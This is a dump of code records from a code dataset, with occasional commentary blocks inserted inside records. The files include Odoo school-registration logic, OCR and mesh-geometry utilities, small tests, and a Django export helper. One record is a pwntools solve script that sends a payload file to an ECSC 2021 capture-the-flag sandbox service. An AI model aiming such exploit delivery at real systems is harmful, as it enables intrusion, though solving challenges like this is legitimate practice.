uid,inv_id, {'name':name})\n\n journal_registration = journal_obj.search(cr, uid, [('registration', '=', True)], context=context)\n if journal_registration:\n cr.execute('update pos_order set sale_journal = %s where id = %s', (journal_registration[0], inv_id))\n\n self.write(cr, uid, [line.id], {'order_id': inv_id}, context=context)\n\n mod_obj = self.pool.get('ir.model.data')\n res = mod_obj.get_object_reference(cr, uid, 'oschool', 'view_oschool_registration_pos_form')\n res_id = res and res[1] or False\n return {\n 'name': _('Payment Registration'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'pos.order',\n 'type': 'ir.actions.act_window',\n 'target' : 'new',\n 'domain': [('id', '=', inv_id)],\n 'view_id': [res_id],\n 'res_id': inv_id,\n }\n\n def onchange_registration(self, cr, uid, ids, student_id, product_id, group_id):\n res = {'value': {}}\n if product_id:\n product = self.pool.get('product.product').browse(cr, uid, product_id)\n res['value']['academic_year_id'] = product.pos_categ_id.academic_year.id\n if not student_id:\n return res\n else:\n partner_obj = self.pool.get('res.partner')\n student = partner_obj.browse(cr, uid, student_id)\n partner_id = student.parent_id\n if not student.allow_registration:\n return {'value': {'student_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('No allow student registration.')}}\n res = self.onchange_product_id(cr, uid, ids, pricelist=partner_id.property_product_pricelist.id, product_id=product_id, qty=1, 
partner_id=partner_id.id)\n if product_id:\n product = self.pool.get('product.product').browse(cr, uid, product_id)\n reg = self.search(cr, uid, [\n ('type', '=', 'registration'),\n ('academic_year_id', '=', product.pos_categ_id.academic_year.id),\n ('student_id', '=', student_id),\n ('qty', '!=', -1),\n ('refunded', '=', False),\n ])\n if len(reg) > 0:\n raise osv.except_osv(_('Warning!'), _('Student already registered.'))\n return {'value': {'product_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Student already registered.')}}\n\n res['value']['academic_year_id'] = product.pos_categ_id.academic_year.id\n res['value']['registration_price'] = res['value']['price_unit']\n if group_id and product_id:\n group = self.pool.get('oschool.groups').browse(cr, uid, group_id)\n number_of_places = group.number_of_places\n reg = self.search(cr, uid, [('type', '=', 'registration'), ('academic_year_id', '=', product.pos_categ_id.academic_year.id), ('group_id', '=', group_id), ('qty', '!=', -1)])\n if number_of_places <= len(reg):\n raise osv.except_osv(_('Warning!'), _('Full Group.'))\n return {'value': {'group_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Full Group.')}}\n res['value']['remaining_places'] = number_of_places - len(reg)\n today = datetime.today()\n line_ids = self.pool.get('pos.order.line').search(cr, uid,[\n ('student_id','=',student_id),\n ('order_id','=',False),\n ('period_id.date_start','<=',datetime.strftime(today, \"%Y-%m-%d\"))\n ])\n if line_ids:\n raise osv.except_osv(_('Warning!'), _('Student have unpaid lines.'))\n\n return res\n\n def onchange_group(self, cr, uid, ids, group_id, academic_year_id, context=None):\n if not academic_year_id and group_id:\n return {'value': {'remaining_places': 0,'group_id': False}, 'warning': {'title': _('Warning!'), 'message': _('Choose Registration Type first.')}}\n if not academic_year_id or not group_id:\n return {'value': {'remaining_places': 0}}\n number_of_places = self.pool.get('oschool.groups').browse(cr, uid, group_id, context=context).number_of_places\n reg = self.search(cr, uid, [\n ('type', '=', 'registration'),\n ('academic_year_id', '=', academic_year_id),\n ('group_id', '=', group_id),\n ('qty', '>', 0),\n ('refunded','=',False)], context=context)\n\n if number_of_places <= len(reg):\n return {'value': {'group_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Full Group.')}}\n return {'value': {'remaining_places': number_of_places - len(reg)}}\n\n def create(self, cr, uid, values, context=None):\n partner_obj = self.pool.get('res.partner')\n res = super(pos_order_line, self).create(cr, uid, values, context=context)\n period_obj = self.pool.get('account.period')\n if 'type' in values:\n if values['type'] == 'registration':\n self.action_payment(cr, uid, [res], context)\n create_date = time.strftime('%Y-%m-%d')\n period_id = period_obj.search(cr, uid, [('date_start', '<=', create_date), ('date_stop', '>=', create_date), ('state', '=', 'draft')], context=context)\n if not period_id:\n raise osv.except_osv(_('Warning!'), _('There is no period defined for this date: %s.') % create_date)\n product = self.pool.get('product.product').browse(cr, uid, values['product_id'])\n self.write(cr, uid, res, {'period_id': period_id[0], 'academic_year_id': product.pos_categ_id.academic_year.id}, context=context)\n student = partner_obj.browse(cr, uid, values['student_id'])\n state_academic_year = product.pos_categ_id.academic_year.state\n if not student.academic_year_id or state_academic_year == 
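The `onchange_*` methods above talk to the form through a `{'value': ..., 'warning': ...}` result dictionary; the old web client reads the lowercase `'warning'` key, so the capitalised `'Warning'` entries above are likely ignored. The expected shape, sketched in the same old-API style:

```python
def onchange_qty(self, cr, uid, ids, qty, context=None):
    res = {'value': {}}
    if qty and qty < 0:
        res['value']['qty'] = 0  # push a corrected value back into the form
        res['warning'] = {       # lowercase 'warning' is what the client displays
            'title': 'Warning!',
            'message': 'Quantity cannot be negative.',
        }
    return res
```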
'current':\n partner_obj.write(cr, uid, student.id, {'academic_year_id': product.pos_categ_id.academic_year.id})\n if not student.group_id or state_academic_year == 'current':\n partner_obj.write(cr, uid, student.id, {'group_id': values['group_id']})\n if not student.class_id and values['class_id'] or state_academic_year == 'current':\n partner_obj.write(cr, uid, student.id, {'class_id': values['class_id']})\n check_minimum_age_registration = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.check_minimum_age_registration\", default=None, context=context)\n company_id =self.pool.get(\"res.users\").browse(cr, uid, uid).company_id.id\n activate_check_minimum_age_registration = self.pool.get(\"res.company\").browse(cr, uid, company_id).activate_check_minimum_age_registration\n group =self.pool.get(\"oschool.groups\").browse(cr, uid, values['group_id'])\n if check_minimum_age_registration:\n if activate_check_minimum_age_registration:\n registration_min_age_year = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.registration_min_age_year\", default=None, context=context)\n registration_min_age_month = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.registration_min_age_month\", default=None, context=context)\n dt = datetime.strptime(product.pos_categ_id.academic_year.date_start, '%Y-%m-%d')\n dt2 = datetime.strptime(student.birthdate, '%Y-%m-%d')\n date_difference = relativedelta.relativedelta(dt, dt2)\n if int(date_difference.years) > int(registration_min_age_year):\n return res\n if int(date_difference.years) == int(registration_min_age_year) and int(date_difference.months) >= int(registration_min_age_month):\n return res\n else:\n raise osv.except_osv(_('Error!'), _('the student does not have the age required for registration'))\n else:\n return res\n return res\n\n def _compute(self, cr, uid, ids, field_names, arg=None, context=None, query='', query_params=()):\n res = {}\n return res\n\n def _registration_price(self, cr, uid, ids, field_names, arg=None, context=None, query='', query_params=()):\n res = {}\n for line in self.browse(cr, uid, ids, context=context):\n res = self.onchange_product_id(cr, uid, ids, pricelist=line.parent_id.property_product_pricelist.id, product_id=line.product_id.id, qty=1, partner_id=line.parent_id.id)\n res[line.id] = res['value']['price_unit']\n return res\n def unlink(self, cr, uid, ids, context=None):\n # boucle pour supprimer +eurs enregistrements aux meme temps\n for id in ids:\n line = self.browse(cr, uid, id)\n # inv = self.browse(cr, uid, ids[0], context=context)\n # #****Club presence*****\n # if line.order_id.type=='club':\n # presence_club_obj = self.pool.get('oschool.student_club_presence')\n # presence_club_ids = presence_club_obj.search(cr, uid, [])\n # presence_club_obj.unlink(cr, uid, presence_club_ids)\n # #****transport presence*****\n # if line.order_id.type=='transport':\n # presence_transport_obj = self.pool.get('oschool.student_transport_presence')\n # presence_transport_ids = presence_transport_obj.search(cr, uid, [])\n # presence_transport_obj.unlink(cr, uid, presence_transport_ids)\n # #****restaurant presence*****\n # if line.order_id.type=='restaurant':\n # presence_restaurant_obj = self.pool.get('oschool.student_restaurant_presence')\n # presence_restaurant_ids = presence_restaurant_obj.search(cr, uid, [])\n # presence_restaurant_obj.unlink(cr, uid, presence_restaurant_ids)\n # #****canteen presence*****\n # if line.order_id.type=='restaurant':\n # 
presence_canteen_obj = self.pool.get('oschool.student_canteen_presence')\n # presence_canteen_ids = presence_canteen_obj.search(cr, uid, [])\n # presence_canteen_obj.unlink(cr, uid, presence_canteen_ids)\n if line.order_id:\n if len(line.order_id.lines) == 1:\n order_id = line.order_id.id\n super(pos_order_line, self).unlink(cr, uid, id, context)\n self.pool.get('pos.order').unlink(cr, uid, order_id)\n else:\n super(pos_order_line, self).unlink(cr, uid, id, context)\n return True\n _columns = {\n 'remaining_places': fields.function(_compute, type='integer', string='Remaining places'),\n 'registration_price': fields.function(_registration_price, type='float', digits_compute=dp.get_precision('Product Price'), string='Price'),\n }\n\npos_order_line()\n\nclass pos_order(osv.osv):\n _inherit = 'pos.order'\n\n def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):\n mod_obj = self.pool.get('ir.model.data')\n if context is None: context = {}\n if view_type == 'form':\n if context.get('pos_id') == 'pos':\n result = mod_obj.get_object_reference(cr, uid, 'oschool', 'view_oschool_registration_pos_form')\n result = result and result[1] or False\n view_id = result\n\n res = super(pos_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)\n return res\n\n\npos_order()\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"prooaddons/oschool/oschool_registration/oschool_registration.py","file_name":"oschool_registration.py","file_ext":"py","file_size_in_byte":19684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"631043917","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the diagonalDifference function below.\ndef diagonalDifference(a):\n diag_a = 0\n diag_b = 0\n m_size = len(a)\n\n for i in range(m_size):\n diag_a = diag_a + a[i][i]\n diag_b = diag_b + a[i][m_size - (i + 1)]\n\n return abs(diag_a - diag_b)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n a = []\n\n for _ in range(n):\n a.append(list(map(int, input().rstrip().split())))\n\n result = diagonalDifference(a)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","sub_path":"warmup/diagonal-difference.py","file_name":"diagonal-difference.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630602152","text":"##################################################\n# import modules #\n##################################################\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pytesseract\nimport os\nimport csv\n\n##################################################\n# helper functions #\n##################################################\n# find all speech bubbles in the given comic page and return a list of cropped speech bubbles (with possible false positives)\ndef findSpeechBubbles(imagePath, method = 'simple'):\n # read image\n image = cv2.imread(imagePath)\n # gray scale\n imageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # filter noise\n imageGrayBlur = cv2.GaussianBlur(imageGray,(3,3),0)\n if method != 'simple':\n # recognizes more complex bubble shapes\n imageGrayBlurCanny = cv2.Canny(imageGrayBlur,50,500)\n binary = cv2.threshold(imageGrayBlurCanny,235,255,cv2.THRESH_BINARY)[1]\n else:\n # 
recognizes only rectangular bubbles\n binary = cv2.threshold(imageGrayBlur,235,255,cv2.THRESH_BINARY)[1]\n # find contours\n contours = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[1]\n # get the list of cropped speech bubbles\n croppedImageList = []\n for contour in contours:\n rect = cv2.boundingRect(contour)\n [x, y, w, h] = rect\n # filter out speech bubble candidates with unreasonable size\n if w < 500 and w > 60 and h < 500 and h > 25:\n # uncomment to view the contour rectangles that are detected\n # cv2.rectangle(image, (x,y), (w+x,h+y), (0,255,0), 2)\n croppedImage = image[y:y+h, x:x+w]\n croppedImageList.append(croppedImage)\n \n # uncomment to view the contour rectangles that are detected\n # cv2.imshow(\"img\", image)\n # cv2.waitKey(0)\n\n return croppedImageList\n\n# apply the ocr engine to the given image and return the recognized script where illegitimate characters are filtered out\ndef tesseract(image):\n script = pytesseract.image_to_string(image, lang = 'eng')\n for char in script:\n if char not in ' -QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm,.?!1234567890\"\":;\\'':\n script = script.replace(char,'')\n \n return script\n\n# loop through each file in the given directory, not including zip files\ndef looper(rootDir):\n fileNameList = []\n filePathList = []\n for subDir, dirs, files in os.walk(rootDir):\n for file in files:\n fileInfo = file.split('.')\n fileName, fileExten = fileInfo[0], fileInfo[-1]\n filePath = os.path.join(subDir, file)\n if fileExten == 'jpg' or fileExten == 'png' or fileExten == '.bmp':\n # if fileExten != 'zip':\n if fileName not in fileNameList:\n fileNameList.append(fileName)\n filePathList.append(filePath)\n\n return filePathList\n\n# denoise the given image with n iterations\ndef denoise(image, n):\n i = 0\n while i < n:\n image = cv2.fastNlMeansDenoisingColored(image)\n i += 1\n\n return image \n\n# append image path and script to the output csv file\ndef write_script_to_csv(imagePath, script, outputFilePath):\n with open(outputFilePath, 'a', encoding = \"utf-8\", newline = \"\") as f:\n writer = csv.writer(f)\n newRow = [imagePath, script]\n writer.writerow(newRow)\n\n##################################################\n# main work #\n##################################################\n# set working directory\npath = \"\"\nos.chdir(path)\n\n# output file path and directory to be looped through\noutputFilePath = 'comic-script.csv'\nrootDir = ''\n\n# initialize output file\nwith open(outputFilePath, 'w',newline = \"\") as f:\n writer = csv.writer(f)\n writer.writerow(['filePath', 'script'])\n\n# for each image in the given directory, process each speech bubble found and feed it to the ocr engine\nfor imagePath in looper(rootDir):\n print(imagePath)\n # find speech bubbles in each image\n try:\n croppedImageList = findSpeechBubbles(imagePath, method = 'simple')\n except:\n continue\n scriptList = []\n for croppedImage in croppedImageList:\n # enlarge\n croppedImage = cv2.resize(croppedImage, (0,0), fx = 2, fy = 2)\n # denoise\n croppedImage = denoise(croppedImage, 2)\n kernel = np.ones((1, 1), np.uint8)\n croppedImage = cv2.dilate(croppedImage, kernel, iterations = 50)\n croppedImage = cv2.erode(croppedImage, kernel, iterations = 50)\n\n # turn gray\n croppedImageGray = cv2.cvtColor(croppedImage, cv2.COLOR_BGR2GRAY)\n # Gaussian filter\n croppedImageGrayBlur = cv2.GaussianBlur(croppedImageGray,(5,5),0)\n # edge detection\n croppedImageGrayBlurLaplacian = cv2.Laplacian(croppedImageGrayBlur,cv2.CV_64F)\n # adjust 
contrast and brightness\n croppedImageGrayBlurLaplacian = np.uint8(np.clip((10 * croppedImageGrayBlurLaplacian + 10), 0, 255))\n\n # pass cropped image to the ocr engine\n script = tesseract(croppedImageGrayBlurLaplacian)\n if script != '' and script not in scriptList:\n scriptList.append(script)\n print(script)\n # append image path and script to the output csv file\n write_script_to_csv(imagePath, script, outputFilePath)","sub_path":"comics/comic_bubble_to_text.py","file_name":"comic_bubble_to_text.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120797423","text":"#!/usr/bin/env python3\nimport sqlite3\nimport os\nfrom bottle import template\nhtml=\"pimark.htm\"\nhtml2=\"gmpimark.htm\"\nhtml3=\"mtgmpimark.htm\"\n\ndef makehtml():\n db=sqlite3.connect(\"test.db\")\n cur=db.execute(\"select * from pimark order by PIC asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"C\")\n if os.path.exists(html):\n os.remove(html)\n\n fi=open(html,'w')\n fi.write(output)\n fi.close()\n print(\"::make html1 ok\")\n \n cur=db.execute(\"select * from pimark order by GMPI asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"GMP\")\n if os.path.exists(html2):\n os.remove(html2)\n\n fi=open(html2,'w')\n fi.write(output)\n fi.close()\n print(\"::make html2 ok\")\n\n cur=db.execute(\"select * from pimark order by MTGMPI asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"MtGMP\")\n if os.path.exists(html3):\n os.remove(html3)\n\n fi=open(html3,'w')\n fi.write(output)\n fi.close()\n print(\"::make html3 ok\")\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n makehtml()\n","sub_path":"server/makehtml.py","file_name":"makehtml.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"547160503","text":"\"\"\"\n@brief test log(time=200s)\n\nskip this test for regular run\n\"\"\"\n\nimport sys\nimport os\nimport unittest\n\ntry:\n import src\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\")))\n if path not in sys.path:\n sys.path.append(path)\n import src\n\ntry:\n import pyquickhelper as skip_\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\",\n \"..\",\n \"pyquickhelper\",\n \"src\")))\n if path not in sys.path:\n sys.path.append(path)\n if \"PYQUICKHELPER\" in os.environ and len(os.environ[\"PYQUICKHELPER\"]) > 0:\n sys.path.append(os.environ[\"PYQUICKHELPER\"])\n import pyquickhelper as skip_\n\n\nfrom src.pymyinstall.packaged import small_set, extended_set, ensae_fullset\nfrom pyquickhelper.loghelper import fLOG\n\n\nclass TestDifference(unittest.TestCase):\n\n def test_diff(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n\n name = set(_.name for _ in small_set())\n keep = []\n for mod in extended_set():\n if mod.name not in name:\n keep.append(mod)\n assert len(keep) > 0\n\n for mod in keep:\n if mod.mname is None:\n fLOG(\n \"ModuleInstall('{0}', '{1}'),\".format(mod.name, mod.kind))\n else:\n fLOG(\"ModuleInstall('{0}', '{1}', mname='{2}'),\".format(\n mod.name, mod.kind, mod.mname))\n\n def test_diff2(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n res = ensae_fullset()\n count = {}\n for mod in res:\n 
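The speech-bubble detector above thresholds the page and keeps contours whose bounding box is plausibly bubble-sized. The index into `cv2.findContours` is version-dependent (OpenCV 3 returns three values, OpenCV 4 returns two), so a version-tolerant sketch looks like this (size limits copied from the script):

```python
import cv2

def bubble_boxes(image_path, min_wh=(60, 25), max_wh=(500, 500)):
    gray = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2GRAY)
    binary = cv2.threshold(cv2.GaussianBlur(gray, (3, 3), 0),
                           235, 255, cv2.THRESH_BINARY)[1]
    found = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    contours = found[0] if len(found) == 2 else found[1]  # OpenCV 4 vs 3
    boxes = []
    for contour in contours:
        x, y, w, h = cv2.boundingRect(contour)
        if min_wh[0] < w < max_wh[0] and min_wh[1] < h < max_wh[1]:
            boxes.append((x, y, w, h))
    return boxes
```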
count[mod.name] = 1\n\n assert \"pyquickhelper\" in count\n assert \"code_beatrix\" in count\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"_unittests/ut_packaged/test_diff.py","file_name":"test_diff.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"157068373","text":"# Etienne St-Onge\n\nimport numpy as np\nimport scipy\n\nfrom scipy.sparse import csc_matrix\n\nfrom trimeshpy.math.util import square_length\nfrom trimeshpy.math.mesh_map import edge_triangle_map\n\nfrom trimeshpy.math.mesh_global import G_DTYPE, G_ATOL\n\n\n# Triangle Angles Functions\n#\n# vi\n# |\\\n# |ai\n# | \\\n# | \\\n# | \\\n# | \\\n# |aj ak\\\n# vj------vk\n#\n# Triangles : [[ i, j, k ], ....]\n# Angles : [[ ai, aj, ak ], ....]\n#\ndef triangle_angle(triangles, vertices):\n if scipy.sparse.__name__ in type(vertices).__module__:\n vertices = vertices.toarray()\n # get theta angles for each points in each triangles\n e_sqr_length = square_length(vertices[np.roll(triangles, 1, axis=1)] -\n vertices[np.roll(triangles, -1, axis=1)],\n axis=2)\n e_length = np.sqrt(e_sqr_length)\n\n # get the every angles of each triangles (opposite angles)\n tri_angles = np.zeros_like(triangles, dtype=G_DTYPE)\n tri_angles[:, 0] = np.arccos((e_sqr_length[:, 1] + e_sqr_length[:, 2] - e_sqr_length[:, 0]) / (2.0 * e_length[:, 1] * e_length[:, 2]))\n tri_angles[:, 1] = np.arccos((e_sqr_length[:, 0] + e_sqr_length[:, 2] - e_sqr_length[:, 1]) / (2.0 * e_length[:, 0] * e_length[:, 2]))\n tri_angles[:, 2] = (np.pi - tri_angles[:, 0] - tri_angles[:, 1])\n\n if not np.allclose(\n np.arccos((e_sqr_length[:, 0] + e_sqr_length[:, 1] - e_sqr_length[:, 2]) / (2.0 * e_length[:, 0] * e_length[:, 1])), tri_angles[:, 2], atol=G_ATOL):\n print(\"WARNING :: triangle_angle\")\n\n return tri_angles\n\n\ndef triangle_is_obtuse(triangles, vertices):\n return np.max(triangle_angle(triangles, vertices), axis=1) - G_ATOL > (np.pi / 2.0)\n\n\ndef triangle_is_acute(triangles, vertices):\n return np.max(triangle_angle(triangles, vertices), axis=1) + G_ATOL < (np.pi / 2.0)\n\n\ndef triangle_is_right(triangles, vertices):\n return np.abs(np.max(triangle_angle(triangles, vertices), axis=1) - (np.pi / 2.0)) < G_ATOL\n\n\n# Edge Angles Functions\n#\n# for the edge e[i,j] = v[i] -> v[j]\n# Theta(T), Alpha(A), Gamma(Y)\n#\n# vj\n# /|\\\n# / | \\\n# Yij|Tji\n# / | \\\n# / ^ \\\n# / | \\\n# / | \\\n# / | \\\n# /Aij Tij|Yji Aji\\\n# vk ---------o--------- vl\n# vi\n#\ndef edge_theta_angle(triangles, vertices):\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the theta of the next edge\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n theta = np.hstack([t_angles[:, 0], t_angles[:, 1], t_angles[:, 2]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n theta_map = csc_matrix((theta, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return theta_map\n\n\ndef edge_alpha_angle(triangles, vertices):\n # alpha_map[i,j] = Aij\n # alpha_map[i,j] = beta_map[j,i]\n\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the Alpha Beta angle for each edge in a connectivity matrix\n # get (directed) edge list (row = i)(col=j) alpha\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], 
triangles[:, 0]])\n alpha = np.hstack([t_angles[:, 2], t_angles[:, 0], t_angles[:, 1]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n alpha_map = csc_matrix((alpha, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return alpha_map\n\n\ndef edge_gamma_angle(triangles, vertices):\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the theta of the next edge\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n gamma = np.hstack([t_angles[:, 1], t_angles[:, 2], t_angles[:, 0]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n gamma_map = csc_matrix((gamma, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return gamma_map\n\n\ndef cotan_alpha_beta_angle(triangles, vertices):\n # cotan of all angle = (tan(a))^-1\n ctn_ab_angles = scipy.tan(edge_alpha_angle(triangles, vertices))\n ctn_ab_angles.data **= -1\n # matrix = cot(a) + cot(b) = cot(a_ij) + cot(b_ji)\n ctn_ab_angles = ctn_ab_angles + ctn_ab_angles.T\n return ctn_ab_angles\n\n\ndef edge_triangle_is_obtuse(triangles, vertices):\n tri_is_obtuse = triangle_is_obtuse(triangles, vertices)\n vv_t_is_obtuse = edge_triangle_map(triangles, vertices)\n vv_t_is_obtuse.data = tri_is_obtuse[vv_t_is_obtuse.data]\n return vv_t_is_obtuse\n\n\ndef edge_triangle_is_acute(triangles, vertices):\n tri_is_acute = triangle_is_acute(triangles, vertices)\n vv_t_is_acute = edge_triangle_map(triangles, vertices)\n vv_t_is_acute.data = tri_is_acute[vv_t_is_acute.data]\n return vv_t_is_acute\n\n\ndef edge_theta_is_obtuse(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data - G_ATOL > (np.pi / 2.0))\n return theta\n\n\ndef edge_theta_is_acute(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data + G_ATOL < (np.pi / 2.0))\n return theta\n\n\ndef edge_slope_angle(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data + G_ATOL < (np.pi / 2.0))\n return theta\n\n\n# edge slope angle ( triangle's normal angle)\ndef edge_triangle_normal_angle(triangles, vertices):\n from trimeshpy.math.normal import triangles_normal\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n triangles_index = np.tile(np.arange(len(triangles)), 3)\n vv_t_map = csc_matrix((triangles_index, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n\n t_normals = triangles_normal(triangles, vertices, True)\n\n e_angles = np.sum(np.squeeze(t_normals[vv_t_map[vts_i, vts_j]] * t_normals[vv_t_map[vts_j, vts_i]]), axis=1)\n # clamp to 1 due to float precision\n e_angles = np.arccos(np.minimum(1, e_angles))\n\n vv_t_angle_map = csc_matrix((e_angles, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return vv_t_angle_map\n","sub_path":"trimeshpy/math/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"306909257","text":"from pwn import *\r\n\r\nelf = ELF('./sandbox')\r\n\r\nif args.GDB:\r\n\tp = gdb.debug(elf.path, '\\n'.join([\r\n\t\t\"b *run_sandbox+173\",\r\n\t\t\"c\",\r\n\t]))\r\nelif args.REMOTE:\r\n\tp = remote(\"ecsc21.hack.cert.pl\", 25732)\r\nelse:\r\n\tp = process(elf.path) \r\n\r\n\r\nwith open(\"./payload\", \"rb\") as f:\r\n\tpayload = 
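`triangle_angle` above recovers interior angles from squared edge lengths via the law of cosines, cos(a_i) = (e_j^2 + e_k^2 - e_i^2) / (2*e_j*e_k), and those angles feed the cotangent weight map. A scalar sanity check of the same identity:

```python
import numpy as np

def interior_angles(p0, p1, p2):
    # squared lengths of the edges opposite each vertex (law of cosines)
    e0 = np.sum((p1 - p2) ** 2)
    e1 = np.sum((p2 - p0) ** 2)
    e2 = np.sum((p0 - p1) ** 2)
    a0 = np.arccos((e1 + e2 - e0) / (2 * np.sqrt(e1 * e2)))
    a1 = np.arccos((e0 + e2 - e1) / (2 * np.sqrt(e0 * e2)))
    return a0, a1, np.pi - a0 - a1

angles = interior_angles(np.array([0., 0.]), np.array([1., 0.]), np.array([0., 1.]))
print(np.degrees(angles))  # [90. 45. 45.]
```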
f.read()\r\n\r\np.sendafter(b\"[+] Reading ELF\\n\", p32(len(payload)) + payload)\r\np.interactive()\r\n","sub_path":"ecsc_2021/clumsy_sandbox/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389062099","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\n\n\ndef url_to_exercise(request, course_key, exercise_key):\n return request.build_absolute_uri(\n reverse('exercise', args=[course_key, exercise_key]))\n\n\ndef url_to_model(request, course_key, exercise_key, parameter=None):\n return request.build_absolute_uri(\n reverse('model', args=[course_key, exercise_key, parameter or ''])\n )\n\n\ndef url_to_template(request, course_key, exercise_key, parameter=None):\n return request.build_absolute_uri(\n reverse('template', args=[course_key, exercise_key, parameter or ''])\n )\n\n\ndef url_to_static(request, course_key, path):\n ''' Creates an URL for a path in static files '''\n return request.build_absolute_uri(\n '{}{}/{}'.format(settings.STATIC_URL, course_key, path))\n\n\ndef chapter(request, course, of):\n ''' Exports chapter data '''\n of['url'] = url_to_static(request, course['key'], of['static_content'])\n return of\n\n\ndef exercise(request, course, exercise, of):\n ''' Exports exercise data '''\n if not \"title\" in of and not \"name\" in of:\n of[\"title\"] = exercise.get(\"title\", \"\")\n if not \"description\" in of:\n of[\"description\"] = exercise.get(\"description\", \"\")\n if \"url\" in exercise:\n of[\"url\"] = exercise[\"url\"]\n else:\n of[\"url\"] = url_to_exercise(request, course['key'], exercise['key'])\n\n of['exercise_info'] = {\n 'form_spec': form_fields(exercise),\n 'resources': [url_to_static(request, course['key'], p) for p in exercise.get('resource_files', [])],\n }\n\n if 'model_answer' in exercise:\n of['model_answer'] = exercise['model_answer']\n elif 'model_files' in exercise:\n file_names = [path.split('/')[-1] for path in exercise['model_files']]\n of['model_answer'] = ' '.join([\n url_to_model(request, course['key'], exercise['key'], name)\n for name in file_names\n ])\n elif exercise.get('view_type', None) == 'access.types.stdsync.createForm':\n of['model_answer'] = url_to_model(\n request, course['key'], exercise['key']\n )\n\n if 'template' in exercise:\n of['template'] = exercise['template']\n elif 'template_files' in exercise:\n file_names = [path.split('/')[-1] for path in exercise['template_files']]\n of['template'] = ' '.join([\n url_to_template(request, course['key'], exercise['key'], name)\n for name in file_names\n ])\n return of\n\n\ndef form_fields(exercise):\n ''' Describes a form that the configured exercise produces '''\n form = []\n t = exercise.get('view_type', None)\n\n def field_spec(f, n):\n field = {\n 'key': f.get('key', 'field_' + str(n)),\n 'type': f['type'],\n 'title': f['title'],\n 'required': f.get('required', False),\n 